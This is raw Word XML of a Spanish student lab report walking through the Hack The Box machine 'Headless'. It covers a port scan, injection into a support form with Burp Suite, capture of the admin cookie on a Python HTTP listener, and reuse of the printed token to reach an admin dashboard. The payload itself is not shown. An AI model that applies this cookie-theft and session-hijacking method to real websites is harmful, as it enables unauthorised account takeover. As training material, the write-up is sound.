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3118B2" w14:textId="77777777" w:rsidR="005D7BF8" w:rsidRDefault="005D7BF8"/>
    <w:p w14:paraId="209196EB" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13EA75A4" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D9CFEB" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BD9BC2" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620D1ACC" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRPr="00494C9D" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE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Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Juan Camilo Peña Marín</w:t>
      </w:r>
      <w:r w:rsidRPr="00494C9D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</w:p>
    <w:p w14:paraId="2BC9DC3B" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0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lang w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A127EEC" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0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lang w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329C2C7B" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0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lang w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C633131" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52B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494C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>PROFESOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462FBB7" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRPr="00494C9D" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00494C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve">JOHAN SEBASTIAN GIRALDO HURTADO </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F904C" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE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12F6DFB" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE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39AFCC5" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE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BDFC916" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE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33241B0" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE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A0EB79B" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE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1A697C4" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE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F191E9B" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRPr="00494C9D" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE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1B80970" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0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lang w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4EBB18" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRPr="00494C9D" w:rsidRDefault="00A52BE0" w:rsidP="00A52B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494C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>INSTITUCION EDUCATIVA EAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C6467" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRPr="00494C9D" w:rsidRDefault="00A52BE0" w:rsidP="00A52B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Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00494C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00494C9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>/2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0054B7B6" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1870FF" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35FFF856" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B55F1A6" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A096544" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D856BC8" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B20BE34" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADD9583" w14:textId="77777777" w:rsidR="00A52BE0" w:rsidRDefault="00A52BE0" w:rsidP="00A52BE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364B6093" w14:textId="736C65FD" w:rsidR="00CB332F" w:rsidRDefault="00B537BD" w:rsidP="00B537BD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Máquina: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB332F">
        <w:t>Headless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB332F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608D6397" w14:textId="5A86E4E3" w:rsidR="005D7BF8" w:rsidRDefault="00CB332F" w:rsidP="00CB332F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Primero</w:t>
      </w:r>
      <w:r w:rsidR="00837F15">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00837F15">
        <w:t>el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00837F15">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00837F15">
        <w:t>hackthebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00837F15">
        <w:t xml:space="preserve"> activamos la máquina y luego</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nos conectamos a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> descargada del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hackthebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B328CAC" w14:textId="566842D3" w:rsidR="00D2393F" w:rsidRDefault="004C3D6F">
      <w:r w:rsidRPr="004C3D6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78D888E4" wp14:editId="69FC6EC8">
            <wp:extent cx="5612130" cy="2757805"/>
            <wp:effectExtent l="0" t="0" r="762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D14F" w14:textId="69B4E4F2" w:rsidR="003267B7" w:rsidRDefault="003267B7"/>
    <w:p w14:paraId="5BC01651" w14:textId="5350A0B6" w:rsidR="003267B7" w:rsidRDefault="003267B7" w:rsidP="003267B7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Agregamos la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> al host local </w:t>
      </w:r>
      <w:r w:rsidR="00837F15">
        <w:t xml:space="preserve">porque no nos permitía ingresar y ya luego de eso hacemos un ping para verificar que hay conectividad de ambos lados </w:t>
      </w:r>
      <w:r w:rsidR="00692F16">
        <w:t>y hacemos un escaneo</w:t>
      </w:r>
      <w:r w:rsidR="00837F15">
        <w:t xml:space="preserve"> para verificar puertos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BF833" w14:textId="1432F0F6" w:rsidR="003267B7" w:rsidRDefault="003267B7" w:rsidP="003267B7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC8FA3B" w14:textId="40D5566F" w:rsidR="00070DAA" w:rsidRDefault="00692F16" w:rsidP="00692F16">
      <w:r w:rsidRPr="00692F16">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A576E8" wp14:editId="0FE6739C">
            <wp:extent cx="5612130" cy="2660650"/>
            <wp:effectExtent l="0" t="0" r="762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89E8" w14:textId="635638BC" w:rsidR="005662F0" w:rsidRDefault="005662F0" w:rsidP="00692F16">
      <w:r w:rsidRPr="005662F0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DCB7223" wp14:editId="1C235330">
            <wp:extent cx="5612130" cy="305054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9B53" w14:textId="77777777" w:rsidR="00A25088" w:rsidRDefault="00A25088" w:rsidP="00070DAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00379C98" w14:textId="56644F7D" w:rsidR="00A25088" w:rsidRDefault="00381458" w:rsidP="00070DAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Al hacer el escaneo, v</w:t>
      </w:r>
      <w:r w:rsidR="00A25088">
        <w:t xml:space="preserve">emos que tiene el puerto 22 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A25088">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A25088">
        <w:t xml:space="preserve"> abierto y el puerto </w:t>
      </w:r>
      <w:r w:rsidR="005662F0">
        <w:t>5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A2D544" w14:textId="77777777" w:rsidR="00692F16" w:rsidRDefault="00692F16" w:rsidP="00070DAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707F13BC" w14:textId="77777777" w:rsidR="00C32036" w:rsidRDefault="00C32036" w:rsidP="00070DAA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56250D0E" w14:textId="373DE508" w:rsidR="00C32036" w:rsidRDefault="0099725A" w:rsidP="00C32036">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Probamos la página para conocerla</w:t>
      </w:r>
      <w:r w:rsidR="00381458">
        <w:t>, así que ingresamos a la dirección agregada al host junto al puerto 5000 que escaneamos y estaba abierto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EEB2B1" w14:textId="6DB4B3FE" w:rsidR="00417AC9" w:rsidRDefault="0097115E" w:rsidP="00417AC9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="0097115E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="486A0ABD" wp14:editId="2720DAC6">
            <wp:extent cx="5612130" cy="3937000"/>
            <wp:effectExtent l="0" t="0" r="762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C0C1" w14:textId="4833074C" w:rsidR="0099725A" w:rsidRDefault="00417AC9" w:rsidP="0099725A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00417AC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68ABCD9E" wp14:editId="040F3513">
            <wp:extent cx="5612130" cy="291973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90D1" w14:textId="77777777" w:rsidR="00491DCF" w:rsidRDefault="00491DCF" w:rsidP="0099725A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16158090" w14:textId="77777777" w:rsidR="00491DCF" w:rsidRDefault="00491DCF" w:rsidP="0099725A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1285839D" w14:textId="77777777" w:rsidR="00381458" w:rsidRDefault="00381458" w:rsidP="00491DCF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Al ingresar a la página, vimos que había unos campos de texto, por lo tanto t</w:t>
      </w:r>
      <w:r w:rsidR="00491DCF">
        <w:t xml:space="preserve">eníamos que manipular las solicitudes para poder entrar. Entonces tratamos con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00491DCF">
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00491DCF">
        <w:t xml:space="preserve"> Suite para </w:t>
      </w:r>
      <w:r w:rsidR="001B5438">
        <w:t xml:space="preserve">inyectar líneas en las solicitudes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F1D799" w14:textId="7AA18E39" w:rsidR="00491DCF" w:rsidRDefault="00381458" w:rsidP="00381458">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al abrir el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> suite, </w:t>
      </w:r>
      <w:r w:rsidR="004C4AE6">
        <w:t xml:space="preserve">Observamos que se mandaban los datos que pusimos en la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C4AE6">
        <w:t>pagina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C4AE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C4AE6">
        <w:t>Support</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y allí tratamos de reenviar cosas para tener acceso a la página</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E8E6C4" w14:textId="2A7CAB26" w:rsidR="00AC6E28" w:rsidRDefault="004C4AE6" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="004C4AE6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BBE9E82" wp14:editId="5AFDB8A0">
            <wp:extent cx="5612130" cy="22028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D369" w14:textId="77777777" w:rsidR="00AC6E28" w:rsidRDefault="00AC6E28" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="113D761B" w14:textId="4521326C" w:rsidR="008F7AD2" w:rsidRDefault="008F7AD2" w:rsidP="008F7AD2">
      <w:r>
        <w:t>Ponemos el siguiente comando</w:t>
      </w:r>
      <w:r w:rsidR="006B21DC">
        <w:t xml:space="preserve"> en nuestra terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAB9FC7" w14:textId="0DC9C955" w:rsidR="008F7AD2" w:rsidRDefault="008F7AD2" w:rsidP="008F7AD2">
      <w:r>
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D00B90" w14:textId="33BA9245" w:rsidR="005F619A" w:rsidRDefault="008F7AD2" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Que sirve para iniciar un servidor http en mi computadora o máquina y escucha en el puerto 1234. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4690E6" w14:textId="10F66519" w:rsidR="006B7188" w:rsidRDefault="006B7188" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="006B7188">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5791261B" wp14:editId="05E059DD">
            <wp:extent cx="5612130" cy="1460500"/>
            <wp:effectExtent l="0" t="0" r="762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A603" w14:textId="77777777" w:rsidR="00485B1B" w:rsidRDefault="00485B1B" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="7D6D882F" w14:textId="6EF0575A" w:rsidR="00485B1B" w:rsidRDefault="00485B1B" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Después de poner a escuchar, mandamos un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>algortimo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en específico en </w:t>
      </w:r>
      <w:r w:rsidR="008600D1">
        <w:t>la página</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>support</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y nos muestra que intento de hackeo detectado</w:t>
      </w:r>
      <w:r w:rsidR="006134FE">
        <w:t>, por lo que si vemos que sirve enviar datos por ahí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CCF901" w14:textId="181015A6" w:rsidR="00FF3F55" w:rsidRDefault="00FF3F55" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00FF3F55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1B5081" wp14:editId="7EEC3E79">
            <wp:extent cx="2896004" cy="222916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AC51" w14:textId="1E7D79BD" w:rsidR="00485B1B" w:rsidRDefault="00485B1B" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00485B1B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB40ADF" wp14:editId="7922F6A1">
            <wp:extent cx="5612130" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="762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0F7E" w14:textId="77777777" w:rsidR="008600D1" w:rsidRDefault="008600D1" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="129C5416" w14:textId="148D3045" w:rsidR="008600D1" w:rsidRDefault="008600D1" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Después de eso, mandamos entonces desde el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r w:rsidR="004A64C5">
        <w:t xml:space="preserve">el mismo </w:t>
      </w:r>
      <w:r w:rsidR="0072438F">
        <w:t>algoritmo</w:t>
      </w:r>
      <w:r w:rsidR="004A64C5">
        <w:t xml:space="preserve"> o código que mandamos </w:t>
      </w:r>
      <w:r w:rsidR="0072438F">
        <w:t>previamente,</w:t>
      </w:r>
      <w:r w:rsidR="004A64C5">
        <w:t xml:space="preserve"> pero al puerto 1234 que tenemos escuchando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB41402" w14:textId="77777777" w:rsidR="00B4021E" w:rsidRDefault="00B4021E" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="1A4B1187" w14:textId="77777777" w:rsidR="00B4021E" w:rsidRDefault="00B4021E" w:rsidP="00B4021E">
      <w:r>
        <w:t>Aquí nos arroja las credenciales del administrador en el puerto escuchado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E20C5A5" w14:textId="77777777" w:rsidR="00B4021E" w:rsidRDefault="00B4021E" w:rsidP="00AC6E28"/>
    <w:p w14:paraId="7CE62468" w14:textId="37D809A3" w:rsidR="004A64C5" w:rsidRDefault="007D3AD0" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="007D3AD0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F67712" wp14:editId="16578C98">
            <wp:extent cx="5612130" cy="277050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FC1B" w14:textId="155402C5" w:rsidR="00DB24AC" w:rsidRDefault="00DB24AC" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00DB24AC">
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB24AC">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB24AC">
        <w:t xml:space="preserve"> 1234   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FB08C5" w14:textId="258DE448" w:rsidR="006134FE" w:rsidRDefault="006134FE" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">la clave del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is_admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C87991A" w14:textId="4F7B536E" w:rsidR="007D3AD0" w:rsidRDefault="0003555E" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Clave: </w:t>
      </w:r>
      <w:r w:rsidRPr="0003555E">
        <w:t>mFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493C826B" w14:textId="1539B688" w:rsidR="006134FE" w:rsidRDefault="006134FE" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Ya con esos datos, vamos al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dashboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y nos dice que acceso no autorizado. Pero como ya tenemos la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> correcta, la cambiamos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C586DC0" w14:textId="54E06A32" w:rsidR="005F619A" w:rsidRDefault="00B4021E" w:rsidP="00AC6E28">
      <w:r>
        <w:t xml:space="preserve">Aquí en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>storage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cambiamos el valor del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> por el que obtuvimos en el puerto y nos deja ya acceder al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dashboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="777741CD" w14:textId="5A1EA3B3" w:rsidR="005F619A" w:rsidRDefault="00B4021E" w:rsidP="00AC6E28">
      <w:r w:rsidRPr="00B4021E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="647AE9A3" wp14:editId="47FB9E9A">
            <wp:extent cx="5612130" cy="246634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B75D" w14:textId="2C406526" w:rsidR="005158A2" w:rsidRDefault="00766DA2" w:rsidP="0081388D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00766DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D752784" wp14:editId="0A63F65A">
            <wp:extent cx="5612130" cy="2545080"/>
            <wp:effectExtent l="0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2741" w14:textId="0A88828D" w:rsidR="005158A2" w:rsidRDefault="005158A2" w:rsidP="0081388D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
